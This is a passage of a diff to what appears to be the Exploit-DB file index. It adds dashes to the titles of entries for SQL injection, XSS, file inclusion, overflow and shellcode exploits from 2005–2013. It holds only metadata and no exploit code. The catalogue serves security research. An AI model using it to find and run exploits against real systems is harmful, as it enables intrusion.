2.1.13 acidcat.mdb Remote Information Disclosure",2005-12-19,admin@hamid.ir,asp,webapps,0 -26875,platforms/asp/webapps/26875.txt,"allinta CMS 2.3.2 faq.asp s Parameter XSS",2005-12-19,r0t3d3Vil,asp,webapps,0 +26873,platforms/asp/webapps/26873.txt,"Acidcat CMS 2.1.13 - default.asp ID Parameter SQL Injection",2005-12-19,admin@hamid.ir,asp,webapps,0 +26874,platforms/asp/webapps/26874.txt,"Acidcat CMS 2.1.13 - acidcat.mdb Remote Information Disclosure",2005-12-19,admin@hamid.ir,asp,webapps,0 +26875,platforms/asp/webapps/26875.txt,"allinta CMS 2.3.2 - faq.asp s Parameter XSS",2005-12-19,r0t3d3Vil,asp,webapps,0 26876,platforms/asp/webapps/26876.txt,"allinta CMS 2.3.2 - search.asp searchQuery Parameter XSS",2005-12-19,r0t3d3Vil,asp,webapps,0 26877,platforms/php/webapps/26877.txt,"Box UK Amaxus CMS 3.0 - Cross-Site Scripting",2005-12-19,r0t3d3Vil,php,webapps,0 26878,platforms/php/webapps/26878.txt,"Caravel CMS 3.0 Beta 1 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,r0t3d3Vil,php,webapps,0 @@ -24023,7 +24023,7 @@ id,file,description,date,author,platform,type,port 26904,platforms/php/webapps/26904.txt,"Bitweaver 1.1.1 beta - list_galleries.php sort_mode Parameter XSS",2005-12-19,r0t,php,webapps,0 26905,platforms/php/webapps/26905.txt,"Bitweaver 1.1.1 view_post.php post_id Parameter XSS",2005-12-19,r0t,php,webapps,0 26906,platforms/php/webapps/26906.txt,"Bitweaver 1.1.1 view.php blog_id Parameter XSS",2005-12-19,r0t,php,webapps,0 -26907,platforms/php/webapps/26907.txt,"Bitweaver 1.1.1 message_box.php sort_mode Parameter XSS",2005-12-19,r0t,php,webapps,0 +26907,platforms/php/webapps/26907.txt,"Bitweaver 1.1.1 - message_box.php sort_mode Parameter XSS",2005-12-19,r0t,php,webapps,0 26908,platforms/php/webapps/26908.txt,"Bitweaver 1.1.1 my.php sort_mode Parameter XSS",2005-12-19,r0t,php,webapps,0 26909,platforms/cfm/webapps/26909.txt,"Community Enterprise 4.x - Multiple Input Validation Vulnerabilities",2005-12-19,r0t3d3Vil,cfm,webapps,0 26910,platforms/cfm/webapps/26910.txt,"E-Publish 2.0 - Multiple Input Validation Vulnerabilities",2005-12-19,r0t3d3Vil,cfm,webapps,0 @@ -24035,9 +24035,9 @@ id,file,description,date,author,platform,type,port 26916,platforms/php/webapps/26916.txt,"Enterprise Connector 1.0.2 Main.php SQL Injection",2005-12-20,"Attila Gerendi",php,webapps,0 26917,platforms/cgi/webapps/26917.txt,"LiveJournal Cleanhtml.PL HTML Injection",2005-12-20,"Andrew Farmer",cgi,webapps,0 26918,platforms/php/webapps/26918.txt,"Plogger Beta 2 - Remote File Inclusion",2005-12-20,"Security .Net Information",php,webapps,0 -26919,platforms/php/webapps/26919.txt,"AbleDesign D-Man 3.0 Title Parameter Cross-Site Scripting",2005-12-20,$um$id,php,webapps,0 +26919,platforms/php/webapps/26919.txt,"AbleDesign D-Man 3.0 - Title Parameter Cross-Site Scripting",2005-12-20,$um$id,php,webapps,0 26920,platforms/cfm/webapps/26920.txt,"Quick Square Development Honeycomb Archive 3.0 CategoryResults.cfm Multiple Parameter SQL Injection",2005-12-20,r0t3d3Vil,cfm,webapps,0 -26921,platforms/php/webapps/26921.txt,"Tolva 0.1 Usermods.php Remote File Inclusion",2005-12-21,xbefordx,php,webapps,0 +26921,platforms/php/webapps/26921.txt,"Tolva 0.1 - Usermods.php Remote File Inclusion",2005-12-21,xbefordx,php,webapps,0 26922,platforms/multiple/dos/26922.pl,"Interaction SIP Proxy 3.0 - Remote Heap Corruption Denial of Service",2005-12-21,"Behrang Fouladi",multiple,dos,0 26923,platforms/php/webapps/26923.txt,"Beehive Forum 0.6.2 - Multiple HTML Injection Vulnerabilities",2005-12-21,"Alireza Hassani",php,webapps,0 26924,platforms/jsp/webapps/26924.txt,"OpenEdit 4.0 Results.HTML Cross-Site Scripting",2005-12-21,r0t3d3Vil,jsp,webapps,0 @@ -24045,8 +24045,8 @@ id,file,description,date,author,platform,type,port 26926,platforms/asp/webapps/26926.txt,"PortalApp 3.3/4.0 - Login.ASP Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 26927,platforms/asp/webapps/26927.txt,"SiteEnable 3.3 - Login.ASP Cross-Site Scripting",2005-12-21,r0t,asp,webapps,0 26928,platforms/asp/webapps/26928.txt,"IntranetApp 3.3 - login.asp ret_page Parameter XSS",2005-12-21,r0t,asp,webapps,0 -26929,platforms/asp/webapps/26929.txt,"IntranetApp 3.3 content.asp Multiple Parameter XSS",2005-12-21,r0t,asp,webapps,0 -26930,platforms/asp/webapps/26930.txt,"ProjectApp 3.3 forums.asp keywords Parameter XSS",2005-12-21,r0t,asp,webapps,0 +26929,platforms/asp/webapps/26929.txt,"IntranetApp 3.3 - content.asp Multiple Parameter XSS",2005-12-21,r0t,asp,webapps,0 +26930,platforms/asp/webapps/26930.txt,"ProjectApp 3.3 - forums.asp keywords Parameter XSS",2005-12-21,r0t,asp,webapps,0 26931,platforms/asp/webapps/26931.txt,"ProjectApp 3.3 - search_employees.asp keywords Parameter XSS",2005-12-21,r0t,asp,webapps,0 26932,platforms/asp/webapps/26932.txt,"ProjectApp 3.3 cat.asp keywords Parameter XSS",2005-12-21,r0t,asp,webapps,0 26933,platforms/cgi/webapps/26933.txt,"ProjectApp 3.3 links.asp keywords Parameter XSS",2005-12-21,r0t,cgi,webapps,0 @@ -24063,7 +24063,7 @@ id,file,description,date,author,platform,type,port 26944,platforms/asp/webapps/26944.txt,"Commercial Interactive Media SCOOP! 2.3 articleZone.asp Invalid Parameter XSS",2005-12-21,r0t3d3Vil,asp,webapps,0 26945,platforms/asp/webapps/26945.txt,"Commercial Interactive Media SCOOP! 2.3 prePurchaserRegistration.asp Invalid Parameter XSS",2005-12-21,r0t3d3Vil,asp,webapps,0 26946,platforms/asp/webapps/26946.txt,"Commercial Interactive Media SCOOP! 2.3 requestDemo.asp Invalid Parameter XSS",2005-12-21,r0t3d3Vil,asp,webapps,0 -26947,platforms/asp/webapps/26947.txt,"Sitekit CMS 6.6 Default.aspx Multiple Parameter XSS",2005-12-21,r0t3d3Vil,asp,webapps,0 +26947,platforms/asp/webapps/26947.txt,"Sitekit CMS 6.6 - Default.aspx Multiple Parameter XSS",2005-12-21,r0t3d3Vil,asp,webapps,0 26948,platforms/asp/webapps/26948.txt,"Sitekit CMS 6.6 Request-call-back.html ClickFrom Parameter XSS",2005-12-21,r0t3d3Vil,asp,webapps,0 26949,platforms/asp/webapps/26949.txt,"Sitekit CMS 6.6 registration-form.html ClickFrom Parameter XSS",2005-12-21,r0t3d3Vil,asp,webapps,0 26950,platforms/windows/local/26950.c,"Symantec Workspace Virtualization 6.4.1895.0 - Local Kernel Mode Privilege Escalation",2013-07-18,MJ0011,windows,local,0 @@ -24077,7 +24077,7 @@ id,file,description,date,author,platform,type,port 26958,platforms/php/webapps/26958.txt,"Anchor CMS 0.9.1 - Stored XSS",2013-07-18,DURAKIBOX,php,webapps,0 26959,platforms/php/webapps/26959.txt,"Papoo 2.1.2 - index.php menuid Parameter SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 26960,platforms/php/webapps/26960.txt,"Papoo 2.1.2 guestbook.php menuid Parameter SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 -26961,platforms/php/webapps/26961.txt,"Papoo 2.1.2 print.php Multiple Parameter SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 +26961,platforms/php/webapps/26961.txt,"Papoo 2.1.2 - print.php Multiple Parameter SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 26962,platforms/php/webapps/26962.txt,"PHPSlash 0.8.1 Article.php SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 26963,platforms/asp/webapps/26963.txt,"Quantum Art QP7.Enterprise news_and_events_new.asp p_news_id Parameter SQL Injection",2005-12-21,r0t3d3Vil,asp,webapps,0 26964,platforms/asp/webapps/26964.txt,"Quantum Art QP7.Enterprise news.asp p_news_id Parameter SQL Injection",2005-12-21,r0t3d3Vil,asp,webapps,0 @@ -24090,11 +24090,11 @@ id,file,description,date,author,platform,type,port 26971,platforms/osx/dos/26971.txt,"Apple Mac OS X KHTMLParser Remote Denial of Service",2005-12-22,"Tom Ferris",osx,dos,0 26972,platforms/jsp/webapps/26972.txt,"oracle application server discussion forum portlet - Multiple Vulnerabilities",2005-12-23,"Johannes Greil",jsp,webapps,0 26973,platforms/php/webapps/26973.txt,"Cerberus Helpdesk 2.649 cer_KnowledgebaseHandler.class.php _load_article_details Function SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 -26974,platforms/php/webapps/26974.txt,"Cerberus Helpdesk 2.649 addresses_export.php queues Parameter SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 +26974,platforms/php/webapps/26974.txt,"Cerberus Helpdesk 2.649 - addresses_export.php queues Parameter SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 26975,platforms/php/webapps/26975.txt,"Cerberus Helpdesk 2.649 display_ticket_thread.php ticket Parameter SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 26976,platforms/php/webapps/26976.txt,"Dev Web Management System 1.5 getfile.php cat Parameter SQL Injection",2005-12-27,retrogod@aliceposta.it,php,webapps,0 -26977,platforms/php/webapps/26977.txt,"Dev Web Management System 1.5 download_now.php target Parameter SQL Injection",2005-12-27,retrogod@aliceposta.it,php,webapps,0 -26978,platforms/php/webapps/26978.txt,"Dev Web Management System 1.5 add.php Multiple Parameter XSS",2005-12-27,retrogod@aliceposta.it,php,webapps,0 +26977,platforms/php/webapps/26977.txt,"Dev Web Management System 1.5 - download_now.php target Parameter SQL Injection",2005-12-27,retrogod@aliceposta.it,php,webapps,0 +26978,platforms/php/webapps/26978.txt,"Dev Web Management System 1.5 - add.php Multiple Parameter XSS",2005-12-27,retrogod@aliceposta.it,php,webapps,0 26979,platforms/php/webapps/26979.txt,"IceWarp Universal WebMail /accounts/inc/include.php Multiple Parameter Remote File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 26980,platforms/php/webapps/26980.txt,"IceWarp Universal WebMail /admin/inc/include.php Multiple Parameter Remote File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 26981,platforms/php/webapps/26981.txt,"IceWarp Universal WebMail /dir/include.html lang Parameter Local File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 @@ -24132,15 +24132,15 @@ id,file,description,date,author,platform,type,port 27009,platforms/php/webapps/27009.txt,"MLM (Multi Level Marketing) Script - Multiple Vulnerabilities",2013-07-22,3spi0n,php,webapps,0 27010,platforms/windows/dos/27010.txt,"VbsEdit 5.9.3 - (.smi) Buffer Overflow",2013-07-22,d3b4g,windows,dos,0 27011,platforms/jsp/webapps/27011.txt,"Sybase EAServer 6.3.1 - Multiple Vulnerabilities",2013-07-22,"SEC Consult",jsp,webapps,0 -27012,platforms/windows/remote/27012.rb,"Apple Quicktime 7 Invalid Atom Length Buffer Overflow",2013-07-22,Metasploit,windows,remote,0 +27012,platforms/windows/remote/27012.rb,"Apple Quicktime 7 - Invalid Atom Length Buffer Overflow",2013-07-22,Metasploit,windows,remote,0 27013,platforms/windows/remote/27013.rb,"HP Managed Printing Administration jobAcct Remote Command Execution",2013-07-22,Metasploit,windows,remote,0 27015,platforms/php/webapps/27015.txt,"Chipmunk Guestbook 1.4 Homepage HTML Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 27016,platforms/php/webapps/27016.txt,"Chimera Web Portal 0.2 modules.php Multiple Parameter XSS",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 27017,platforms/php/webapps/27017.txt,"Chimera Web Portal 0.2 linkcategory.php id Parameter SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 -27018,platforms/php/webapps/27018.txt,"ScozNet ScozBook 1.1 AdminName Variable SQL Injection",2006-01-02,"Aliaksandr Hartsuyeu",php,webapps,0 +27018,platforms/php/webapps/27018.txt,"ScozNet ScozBook 1.1 - AdminName Variable SQL Injection",2006-01-02,"Aliaksandr Hartsuyeu",php,webapps,0 27019,platforms/php/webapps/27019.txt,"VBulletin 3.5.2 Event Title HTML Injection",2006-02-01,trueend5,php,webapps,0 27020,platforms/php/webapps/27020.txt,"Drupal 4.x - URL-Encoded Input HTML Injection",2006-01-01,liz0,php,webapps,0 -27021,platforms/cgi/webapps/27021.txt,"DiscusWare Discus 3.10 Error Message Cross-Site Scripting",2006-01-02,$um$id,cgi,webapps,0 +27021,platforms/cgi/webapps/27021.txt,"DiscusWare Discus 3.10 - Error Message Cross-Site Scripting",2006-01-02,$um$id,cgi,webapps,0 27022,platforms/php/webapps/27022.txt,"INCOGEN Bugport 1.x - Multiple SQL Injection",2006-01-03,r0t,php,webapps,0 27023,platforms/php/webapps/27023.txt,"INCOGEN Bugport 1.x - Index.php Multiple Cross-Site Scripting Vulnerabilities",2006-01-03,r0t,php,webapps,0 27024,platforms/windows/remote/27024.txt,"EFileGo 3.0 - Multiple Input Validation Vulnerabilities",2006-01-03,dr_insane,windows,remote,0 @@ -24175,10 +24175,10 @@ id,file,description,date,author,platform,type,port 27049,platforms/windows/dos/27049.txt,"XnView 2.03 - (.pct) Buffer Overflow",2013-07-23,"Core Security",windows,dos,0 27050,platforms/windows/dos/27050.txt,"DirectShow Arbitrary Memory Overwrite (MS13-056)",2013-07-23,"Andrés Gómez Ramírez",windows,dos,0 27051,platforms/windows/dos/27051.txt,"Microsoft Windows Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities",2006-01-09,cocoruder,windows,dos,0 -27052,platforms/php/webapps/27052.txt,"427BB 2.2 Showthread.php SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 -27053,platforms/php/webapps/27053.txt,"Venom Board Post.php3 - Multiple SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 +27052,platforms/php/webapps/27052.txt,"427BB 2.2 - Showthread.php SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 +27053,platforms/php/webapps/27053.txt,"Venom Board - Post.php3 Multiple SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 27054,platforms/php/webapps/27054.txt,"427BB 2.2 - Authentication Bypass",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 -27055,platforms/windows/dos/27055.txt,"Microsoft Excel 95-2004 Malformed Graphic File Code Execution",2006-01-09,ad@heapoverflow.com,windows,dos,0 +27055,platforms/windows/dos/27055.txt,"Microsoft Excel 95-2004 - Malformed Graphic File Code Execution",2006-01-09,ad@heapoverflow.com,windows,dos,0 27056,platforms/linux/local/27056.pl,"Sudo 1.6.x - Environment Variable Handling Security Bypass (1)",2006-01-09,"Breno Silva Pinto",linux,local,0 27057,platforms/linux/local/27057.py,"Sudo 1.6.x - Environment Variable Handling Security Bypass (2)",2006-01-09,"Breno Silva Pinto",linux,local,0 27058,platforms/php/webapps/27058.txt,"PHP-Nuke 7.7 EV Search Module - SQL Injection",2006-01-09,Lostmon,php,webapps,0 @@ -24194,7 +24194,7 @@ id,file,description,date,author,platform,type,port 27068,platforms/php/webapps/27068.txt,"MyPHPim Login Page pass Field SQL Injection",2006-01-11,"Aliaksandr Hartsuyeu",php,webapps,0 27069,platforms/windows/dos/27069.txt,"Apple QuickTime 6.4/6.5/7.0.x - PictureViewer JPEG/PICT File Buffer Overflow",2006-01-11,"Dennis Rand",windows,dos,0 27070,platforms/php/webapps/27070.txt,"Interspire TrackPoint NX Index.php Cross-Site Scripting",2006-01-12,"M.Neset KABAKLI",php,webapps,0 -27071,platforms/asp/webapps/27071.txt,"Fog Creek Software FogBugz 4.0 29 Default.ASP Cross-Site Scripting",2006-01-12,"M.Neset KABAKLI",asp,webapps,0 +27071,platforms/asp/webapps/27071.txt,"Fog Creek Software FogBugz 4.0 29 - Default.ASP Cross-Site Scripting",2006-01-12,"M.Neset KABAKLI",asp,webapps,0 27072,platforms/windows/remote/27072.pl,"Microsoft Visual Studio - UserControl Remote Code Execution (1)",2006-01-12,anonymous,windows,remote,0 27073,platforms/windows/remote/27073.txt,"Microsoft Visual Studio - UserControl Remote Code Execution (2)",2006-01-12,priestmaster,windows,remote,0 27075,platforms/php/webapps/27075.txt,"TankLogger 2.4 General Functions Script SQL Injection",2006-01-12,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24204,7 +24204,7 @@ id,file,description,date,author,platform,type,port 27079,platforms/asp/webapps/27079.txt,"Web Host Automation Ltd. Helm 3.2.8 - ForgotPassword.ASP Cross-Site Scripting",2006-01-13,"M.Neset KABAKLI",asp,webapps,0 27080,platforms/php/webapps/27080.txt,"EZDatabaseRemote 2.0 PHP Script Code Execution",2006-01-14,r0t3d3Vil,php,webapps,0 27081,platforms/cgi/webapps/27081.txt,"Ultimate Auction 3.67 Item.PL Cross-Site Scripting",2006-01-14,querkopf,cgi,webapps,0 -27082,platforms/windows/dos/27082.txt,"Microsoft Internet Explorer 5.0.1 Malformed IMG and XML Parsing Denial of Service",2006-01-16,"Inge Henriksen",windows,dos,0 +27082,platforms/windows/dos/27082.txt,"Microsoft Internet Explorer 5.0.1 - Malformed IMG and XML Parsing Denial of Service",2006-01-16,"Inge Henriksen",windows,dos,0 27083,platforms/asp/webapps/27083.txt,"8Pixel.net SimpleBlog 2.1 - Multiple Input Validation Vulnerabilities",2006-01-16,Zinho,asp,webapps,0 27084,platforms/php/webapps/27084.txt,"Bit 5 Blog 8.1 - Index.php SQL Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0 27085,platforms/php/webapps/27085.txt,"Bit 5 Blog 8.1 AddComment.php HTML Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24218,7 +24218,7 @@ id,file,description,date,author,platform,type,port 27093,platforms/php/webapps/27093.txt,"EZDatabase 2.1.1 - Index.php Cross-Site Scripting",2006-01-16,"Josh Zlatin-Amishav",php,webapps,0 27094,platforms/multiple/dos/27094.txt,"AmbiCom Blue Neighbors 2.50 build 2500 Bluetooth Stack Object Push Buffer Overflow",2006-01-16,"Kevin Finisterre",multiple,dos,0 27095,platforms/multiple/remote/27095.txt,"Apache Tomcat / Geronimo 1.0 - Sample Script cal2.jsp time Parameter XSS",2006-01-16,"Oliver Karow",multiple,remote,0 -27096,platforms/multiple/remote/27096.txt,"Apache Geronimo 1.0 Error Page XSS",2006-01-16,"Oliver Karow",multiple,remote,0 +27096,platforms/multiple/remote/27096.txt,"Apache Geronimo 1.0 - Error Page XSS",2006-01-16,"Oliver Karow",multiple,remote,0 27097,platforms/php/webapps/27097.txt,"phpXplorer 0.9.33 Workspaces.php Directory Traversal",2006-01-16,"Oriol Torrent Santiago",php,webapps,0 27098,platforms/php/webapps/27098.txt,"RedKernel Referrer Tracker 1.1.0-3 - Rkrt_stats.php Cross-Site Scripting",2006-01-16,Preddy,php,webapps,0 27099,platforms/php/webapps/27099.txt,"BlogPHP 1.0 - Index.php SQL Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24233,7 +24233,7 @@ id,file,description,date,author,platform,type,port 27108,platforms/multiple/dos/27108.txt,"Dual DHCP DNS Server 1.0 DHCP Options Remote Buffer Overflow",2006-01-07,"Luigi Auriemma",multiple,dos,0 27109,platforms/php/webapps/27109.txt,"Phpclanwebsite 1.23.1 BBCode IMG Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0 27110,platforms/php/webapps/27110.txt,"Eggblog 2.0 blog.php id Parameter SQL Injection",2006-01-18,alex@evuln.com,php,webapps,0 -27111,platforms/php/webapps/27111.txt,"Eggblog 2.0 topic.php message Parameter XSS",2006-01-18,alex@evuln.com,php,webapps,0 +27111,platforms/php/webapps/27111.txt,"Eggblog 2.0 - topic.php message Parameter XSS",2006-01-18,alex@evuln.com,php,webapps,0 27112,platforms/php/webapps/27112.txt,"SaralBlog 1.0 - Multiple Input Validation Vulnerabilities",2006-01-18,"Aliaksandr Hartsuyeu",php,webapps,0 27113,platforms/windows/dos/27113.c,"BitComet 0.60 Torrent File Handling Remote Buffer Overflow",2006-01-19,"Dejun Meng",windows,dos,0 27114,platforms/php/webapps/27114.txt,"WebspotBlogging 3.0 - Login.php SQL Injection",2006-01-19,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24245,7 +24245,7 @@ id,file,description,date,author,platform,type,port 27120,platforms/php/webapps/27120.txt,"AZ Bulletin Board 1.0.x/1.1 - Post.php HTML Injection",2006-01-23,"Roozbeh Afrasiabi",php,webapps,0 27121,platforms/php/webapps/27121.txt,"123 Flash Chat 5.0 - Remote Code Injection Weakness",2006-01-24,"Jesus Olmos Gonzalez",php,webapps,0 27122,platforms/php/webapps/27122.txt,"MyBB 1.0.1/1.0.2 Notepad UserCP.php HTML Injection",2006-01-24,"Roozbeh Afrasiabi",php,webapps,0 -27123,platforms/php/webapps/27123.txt,"Pixelpost 1.4.3 User Comment HTML Injection",2006-01-24,"Aliaksandr Hartsuyeu",php,webapps,0 +27123,platforms/php/webapps/27123.txt,"Pixelpost 1.4.3 - User Comment HTML Injection",2006-01-24,"Aliaksandr Hartsuyeu",php,webapps,0 27124,platforms/php/webapps/27124.txt,"SleeperChat 0.3f Index.php Cross-Site Scripting",2006-01-24,hackologie,php,webapps,0 27125,platforms/php/webapps/27125.txt,"miniBloggie 1.0 - Login.php SQL Injection",2006-01-24,"Aliaksandr Hartsuyeu",php,webapps,0 27126,platforms/php/webapps/27126.txt,"CheesyBlog 1.0 - Multiple HTML Injection Vulnerabilities",2006-01-25,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24257,7 +24257,7 @@ id,file,description,date,author,platform,type,port 27132,platforms/hardware/shellcode/27132.txt,"MIPS - (Little Endian) system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",hardware,shellcode,0 27133,platforms/mips/remote/27133.py,"ASUS RT-AC66U acsd Param - Remote Root Shell Exploit",2013-07-27,"Jacob Holcomb",mips,remote,0 27134,platforms/hardware/webapps/27134.pl,"Broadkam PJ871 - Authentication Bypass",2013-07-27,d3c0der,hardware,webapps,0 -27135,platforms/multiple/remote/27135.rb,"Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution",2013-07-27,Metasploit,multiple,remote,8080 +27135,platforms/multiple/remote/27135.rb,"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution",2013-07-27,Metasploit,multiple,remote,8080 27136,platforms/php/webapps/27136.txt,"Symantec Web Gateway 5.1.0.x - Multiple Vulnerabilities",2013-07-27,"SEC Consult",php,webapps,0 27137,platforms/php/webapps/27137.txt,"MyBB 1.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-26,imei,php,webapps,0 27138,platforms/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 Comentarios.php SQL Injection",2006-01-26,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24273,14 +24273,14 @@ id,file,description,date,author,platform,type,port 27148,platforms/php/webapps/27148.txt,"Nuked-klaN 1.7 - Index.php Cross-Site Scripting",2006-01-30,night_warrior771,php,webapps,0 27149,platforms/php/webapps/27149.txt,"Ashwebstudio Ashnews 0.83 - Cross-Site Scripting",2006-01-30,0o_zeus_o0,php,webapps,0 27150,platforms/linux/remote/27150.txt,"Mozilla Firefox 1.0/1.5 XBL - MOZ-BINDING Property Cross-Domain Scripting",2006-01-30,"Chris Thomas",linux,remote,0 -27151,platforms/asp/webapps/27151.txt,"Daffodil CRM 1.5 Userlogin.ASP SQL Injection",2006-01-30,preben@watchcom.no,asp,webapps,0 +27151,platforms/asp/webapps/27151.txt,"Daffodil CRM 1.5 - Userlogin.ASP SQL Injection",2006-01-30,preben@watchcom.no,asp,webapps,0 27152,platforms/php/webapps/27152.txt,"BrowserCRM - Results.php Cross-Site Scripting",2006-01-31,preben@watchcom.no,php,webapps,0 27153,platforms/php/webapps/27153.txt,"Cerberus Helpdesk 2.7 Clients.php Cross-Site Scripting",2006-01-31,preben@watchcom.no,php,webapps,0 27154,platforms/php/webapps/27154.txt,"FarsiNews 2.1 Loginout.php Remote File Inclusion",2006-01-31,"Hamid Ebadi",php,webapps,0 27155,platforms/php/webapps/27155.txt,"MyBB 1.0/1.1 - Index.php Referrer Cookie SQL Injection",2006-01-31,Devil-00,php,webapps,0 -27156,platforms/php/webapps/27156.txt,"SZUserMgnt 1.4 Username Parameter SQL Injection",2006-02-01,"Aliaksandr Hartsuyeu",php,webapps,0 +27156,platforms/php/webapps/27156.txt,"SZUserMgnt 1.4 - Username Parameter SQL Injection",2006-02-01,"Aliaksandr Hartsuyeu",php,webapps,0 27157,platforms/php/webapps/27157.txt,"SPIP 1.8/1.9 - Multiple SQL Injection",2006-02-01,Siegfried,php,webapps,0 -27158,platforms/php/webapps/27158.txt,"SPIP 1.8/1.9 Index.php3 - Cross-Site Scripting",2006-02-01,Siegfried,php,webapps,0 +27158,platforms/php/webapps/27158.txt,"SPIP 1.8/1.9 - Index.php3 Cross-Site Scripting",2006-02-01,Siegfried,php,webapps,0 27159,platforms/multiple/dos/27159.txt,"Fcron 3.0 - Convert-FCronTab Local Buffer Overflow",2006-02-01,"Adam Zabrocki",multiple,dos,0 27160,platforms/asp/webapps/27160.txt,"SoftMaker Shop - Multiple Cross-Site Scripting Vulnerabilities",2006-02-02,preben@watchcom.no,asp,webapps,0 27161,platforms/asp/webapps/27161.txt,"CyberShop Ultimate E-commerce Multiple Cross-Site Scripting Vulnerabilities",2006-02-02,B3g0k,asp,webapps,0 @@ -24305,9 +24305,9 @@ id,file,description,date,author,platform,type,port 27181,platforms/multiple/remote/27181.txt,"IBM Lotus Domino 6.x/7.0 iNotes javascript: Filter Bypass",2006-02-10,"Jakob Balle",multiple,remote,0 27182,platforms/multiple/remote/27182.txt,"IBM Lotus Domino 6.x/7.0 iNotes Email Subject XSS",2006-02-10,"Jakob Balle",multiple,remote,0 27183,platforms/php/webapps/27183.txt,"FarsiNews 2.1/2.5 show_archives.php template Parameter Traversal Arbitrary File Access",2006-02-10,"Hamid Ebadi",php,webapps,0 -27184,platforms/php/webapps/27184.txt,"HiveMail 1.2.2/1.3 addressbook.update.php contactgroupid Variable Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps,0 +27184,platforms/php/webapps/27184.txt,"HiveMail 1.2.2/1.3 - addressbook.update.php contactgroupid Variable Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps,0 27185,platforms/php/webapps/27185.txt,"HiveMail 1.2.2/1.3 folders.update.php folderid Variable Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps,0 -27186,platforms/php/webapps/27186.txt,"HiveMail 1.2.2/1.3 index.php - $_SERVER['PHP_SELF'] XSS",2006-02-11,"GulfTech Security",php,webapps,0 +27186,platforms/php/webapps/27186.txt,"HiveMail 1.2.2/1.3 - index.php $_SERVER['PHP_SELF'] XSS",2006-02-11,"GulfTech Security",php,webapps,0 27187,platforms/jsp/webapps/27187.py,"OpenEMM-2013 8.10.380.hf13.0.066 - SOAP SQL Injection / Stored XSS",2013-07-29,drone,jsp,webapps,0 27188,platforms/ios/webapps/27188.txt,"Private Photos 1.0 iOS - Persistent XSS",2013-07-29,Vulnerability-Lab,ios,webapps,0 27189,platforms/ios/webapps/27189.txt,"WebDisk 3.0.2 PhotoViewer iOS - Command Execution",2013-07-29,Vulnerability-Lab,ios,webapps,0 @@ -24317,11 +24317,11 @@ id,file,description,date,author,platform,type,port 27193,platforms/php/webapps/27193.txt,"LinPHA 0.9.x/1.0 - install.php language Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0 27194,platforms/php/webapps/27194.txt,"LinPHA 0.9.x/1.0 - sec_stage_install.php language Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0 27195,platforms/php/webapps/27195.txt,"LinPHA 0.9.x/1.0 - forth_stage_install.php language Variable POST Method Local File Inclusion",2006-02-11,rgod,php,webapps,0 -27196,platforms/multiple/dos/27196.txt,"IBM Tivoli Directory Server 6.0 Unspecified LDAP Memory Corruption",2006-02-11,"Evgeny Legerov",multiple,dos,0 +27196,platforms/multiple/dos/27196.txt,"IBM Tivoli Directory Server 6.0 - Unspecified LDAP Memory Corruption",2006-02-11,"Evgeny Legerov",multiple,dos,0 27197,platforms/php/webapps/27197.txt,"ImageVue 0.16.1 - dir.php Folder Permission Disclosure",2006-02-11,zjieb,php,webapps,0 27198,platforms/php/webapps/27198.txt,"ImageVue 0.16.1 readfolder.php path Variable Arbitrary Directory Listing",2006-02-11,zjieb,php,webapps,0 27199,platforms/php/webapps/27199.txt,"ImageVue 0.16.1 - index.php bgcol Parameter XSS",2006-02-11,zjieb,php,webapps,0 -27200,platforms/php/webapps/27200.txt,"ImageVue 0.16.1 upload.php Unrestricted File Upload",2006-02-11,zjieb,php,webapps,0 +27200,platforms/php/webapps/27200.txt,"ImageVue 0.16.1 - upload.php Unrestricted File Upload",2006-02-11,zjieb,php,webapps,0 27201,platforms/php/webapps/27201.txt,"Siteframe Beaumont 5.0.1 - Search.php Q Parameter Cross-Site Scripting",2006-02-12,Kiki,php,webapps,0 27202,platforms/php/webapps/27202.txt,"Lawrence Osiris DB_eSession 1.0.2 Class SQL Injection",2006-02-13,"GulfTech Security",php,webapps,0 27203,platforms/hardware/remote/27203.pl,"Fortinet FortiGate 2.x/3.0 URL Filtering Bypass",2006-02-13,"Mathieu Dessus",hardware,remote,0 @@ -24358,7 +24358,7 @@ id,file,description,date,author,platform,type,port 27234,platforms/linux/remote/27234.txt,"SAP Business Connector 4.6/4.7 